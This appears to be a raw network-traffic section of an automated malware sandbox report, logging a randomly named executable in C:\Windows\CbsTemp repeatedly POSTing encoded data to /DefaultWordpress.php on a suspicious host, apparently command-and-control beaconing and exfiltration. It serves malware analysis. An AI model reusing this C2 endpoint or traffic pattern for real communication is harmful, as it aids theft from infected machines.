                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12968&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=826&delivery_rate=110745&cwnd=48&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50025 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 20, 2024 18:18:53.854254961 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Oct 20, 2024 18:18:54.214533091 CEST | 2528 | OUT | (request body)
Oct 20, 2024 18:18:54.675707102 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.038125992 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.046444893 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2Bg2YtJ%2BqYmvUnaY7tF3hGqn5p6rJ3%2BbYzw3hoYOgE1N2jjlWyOK8SeFDW1Z6ns%2B%2F17EWO6cK58Wa6zmf7Vtt6Og2kkJVyRXMjnStcs0S76%2BKRbXfK6kjRKyIGUZrSd87iuM1YxwIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53933b4a255c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11240&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130227&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50027 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 20, 2024 18:18:53.886749983 CEST | 310 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Oct 20, 2024 18:18:54.245465994 CEST | 540 | OUT | (request body)
Oct 20, 2024 18:18:54.675694942 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.038136005 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.038172960 CEST | 796 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4HggySRqWzY4LZ%2B6XxWGb4Ygqq1DPkqTszEJgObb2SmM1miRuXMHvuLxB%2BT%2Fw5R%2Bf%2BNade2lx2Jil6B%2Fm3FU%2F1k6QaVOQkwbXaAA8tr2eDVf8LHiuoCr1CZr6LQaWgI4jc%2B8DEhAoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53933b152710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11309&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=128585&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 20, 2024 18:18:55.038620949 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----Pv8pm7zxVL6QdYKSFHyggQKKz8qKsZUW2Z
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3014
                                                          Expect: 100-continue
Oct 20, 2024 18:18:55.208601952 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.208749056 CEST | 3014 | OUT | (request body)
Oct 20, 2024 18:18:55.601439953 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zM2hXn7tumyy8r50Z9X%2BQbFDyY2G7CoVlnbCOLaZXm6r0a5wT772r%2BnkvEFml%2BTV3fdDrF%2BWpOgUwVHaX0D3jgDRHXfM7DH7sMACjYNqW3NgU3dmasIzlJaXmeWNW%2BuQzUnPpZqkmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53968eca2710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11309&sent=6&recv=11&lost=0&retrans=0&sent_bytes=846&recv_bytes=4186&delivery_rate=254035&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 20, 2024 18:18:55.602957964 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----tvPFcKajitlNWzczXkNzA6CXVW19pPAyee
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2982
                                                          Expect: 100-continue
Oct 20, 2024 18:18:55.776715994 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.776868105 CEST | 2982 | OUT | (request body)
Oct 20, 2024 18:18:56.165977955 CEST | 797 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iS7WUgxHKRddz1WIrt%2BGjvUW7bs5l5%2F8HjF%2Bes7cQO9vwXoRB0YQokqpdMzZPhU%2B63H1%2BGVULtBEGzOlyitX8gQohzpOvo%2BqzAlcfGnEbL3a47KA1IOgWdOTxF2co8jp294mCW4Nag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a539a1b662710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11271&sent=10&recv=18&lost=0&retrans=0&sent_bytes=1664&recv_bytes=7490&delivery_rate=257011&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:56.166871071 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:56.343043089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:56.343218088 CEST | 1924 | OUT | (request body)
                                                          Oct 20, 2024 18:18:56.728576899 CEST | 940 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dQnz3fxQKMpUIY4ZuD6DnHobVd8wtmYpsn1nd0Ii%2B60yqWZAQlN9kbAH8SeFlOSWsYo8wbubr1yBVy4mOP0Br79Jxr3vw6FDvxiiivX0Cw40WEDQe4YOqJBM1xu%2FQPnhFevN%2BKdhcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a539d9f732710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11288&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2486&recv_bytes=9701&delivery_rate=257011&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          49 | 192.168.2.5 | 50028 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:55.172306061 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:55.525763035 CEST | 2528 | OUT | (request body)
                                                          Oct 20, 2024 18:18:55.975980043 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:56.198065042 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpT1axHLejSageQ5RER9euAulf199X7cWO0t8lVpUjtkUbxOzlPjPkzXGxmyPPjbnlwqZk5L2gKddNpDel7%2FSmo9gGNETRgz2XgN%2BuZo%2FPM5pBR6SW9lYzI0ONAPQNLs96L2aEODXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a539b59d396e1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12896&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111659&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          50 | 192.168.2.5 | 50029 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:56.337438107 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:56.681994915 CEST | 2528 | OUT | (request body)
                                                          Oct 20, 2024 18:18:57.127840042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:57.340681076 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:57.365863085 CEST | 799 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhP08VouHohVzv3C5CaRjp%2BrQXcCmEzn6WBRFf%2BkE0fUviTiISLxxt5UikzFXmL7cM%2F4j%2BMkYE2GMbyqf%2FGgnWRssn%2BpVMg96uYkp%2FZACSXaNuKnJUBA%2FNv595EsQhGSes0hsSRTOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53a28f3f96e4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12890&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112605&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          51 | 192.168.2.5 | 50030 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:57.584322929 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:57.931993961 CEST | 2528 | OUT | (request body)
                                                          Oct 20, 2024 18:18:58.350317955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:58.734368086 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOQ2qeae0jtKyf9rtXQchJ0xfY4pSTWf%2FtIPZsqZjatJUcFl2k8t1DukFdeJ5VlBstD9aezurkqFip7t4UzZfrOfxURnw00hi5irR3PFH11RVp0l2Yo0LfwcVZWSYJW7v5W%2BO0hixA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53aa2a17172a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11322&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=129101&cwnd=59&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          52 | 192.168.2.5 | 50031 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:58.862334013 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:59.214013100 CEST | 2528 | OUT | (request body)
                                                          Oct 20, 2024 18:18:59.647763014 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:00.033348083 CEST | 792 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hg43ubRL42nUPMoa%2FTXYmwenE2vYEH6GKNvOizpJqr1jgxVFZPAxvntfHkgw4fnPqIkhJlVjo%2F5xZ7HXJLbkO186bGcVu7KcMFK5RLB7iyCPdy8JsdWg8FFL%2BUsYOIQHcmqRl6%2Fa%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53b24d51f9f9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12897&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=125259&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          53 | 192.168.2.5 | 50032 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:00.252286911 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:00.603921890 CEST | 2528 | OUT | (request body)


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          54 | 192.168.2.5 | 50033 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:01.753119946 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:02.104469061 CEST | 1948 | OUT | (request body)
                                                          Oct 20, 2024 18:19:02.562510014 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:02.930489063 CEST | 934 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7Qe1lPi187EagA5GBiwpAKDaW5XARlbeKfxbWiVytfeHV7vV6ZXpBDXnWLddsi7gYu8ZChXArNX%2BCQdiq0txIbid%2BJNNpIZ7ArSADr6uOoM2y8yOYsibWb7TAYlBagUZqTFGcdsLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c47e9e987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11170&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=129228&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Oct 20, 2024 18:19:03.147876024 CEST | 286 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:03.152664900 CEST | 934 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7Qe1lPi187EagA5GBiwpAKDaW5XARlbeKfxbWiVytfeHV7vV6ZXpBDXnWLddsi7gYu8ZChXArNX%2BCQdiq0txIbid%2BJNNpIZ7ArSADr6uOoM2y8yOYsibWb7TAYlBagUZqTFGcdsLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c47e9e987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11170&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=129228&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Oct 20, 2024 18:19:03.318171024 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:03.318344116 CEST | 540 | OUT | (request body)
                                                          Oct 20, 2024 18:19:04.118716955 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NROgKoSlnwASvYi1Kdbz4CxWMHOWZAz7a9iMopnkNGM8ncOgByRR9%2FPfgbkWuXjvkTbVaRxjR5OEgihhKLpBCYq2CuI%2B9OepiSPcvu%2BICJz%2FMQ%2BEpZJtjiUrs1ykvyPQbqRwDkyIzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c93ad5987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11195&sent=7&recv=10&lost=0&retrans=0&sent_bytes=984&recv_bytes=3085&delivery_rate=256328&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:19:04.119462967 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----MPho9DAeco10vW2pgPLJfMXn3NFOjUpHuh
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2978
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:04.296036005 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:04.296330929 CEST | 2978 | OUT | (request body)
                                                          Oct 20, 2024 18:19:04.688971043 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=owCaHN%2BGmWUiqmSsO4eSMj1zCuVzZgdUizHPYKffOyXEKJRJC%2F%2Fs7a852YHgg9%2BFSZNx4D6l8B46agU9Etf1z2KTBaK2ehEh9QqcBxtnYL0wXqPv5r0yZ8Cc9DmBfxn9HaDwFbH0RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53cf48bb987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11275&sent=12&recv=17&lost=0&retrans=0&sent_bytes=1802&recv_bytes=6385&delivery_rate=256328&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          55 | 192.168.2.5 | 50034 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:01.905075073 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:02.261285067 CEST | 2528 | OUT | Data Raw: 5b 51 5c 5f 5a 5d 51 51 54 5b 52 57 50 53 57 50 50 5e 5d 56 50 56 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\_Z]QQT[RWPSWPP^]VPVW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)-_2%+/[3(W<4Z)4Y';[&W?^02Y'X=(#F $P.
                                                          Oct 20, 2024 18:19:03.196873903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:03.665529013 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzh57Nffn7WSthLPAOHcYrxV4w%2BmfokYOJGI87iJVLvYt6TQRwgc0LcjshVkbpaf0xr5yqKI6HitJmYPeHqY8SAG71Fs%2BOMulxEyMQjzdzr7fA%2B3V9WOIlLekDdvD74nouhRWj5BtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c87808cf31-SJC
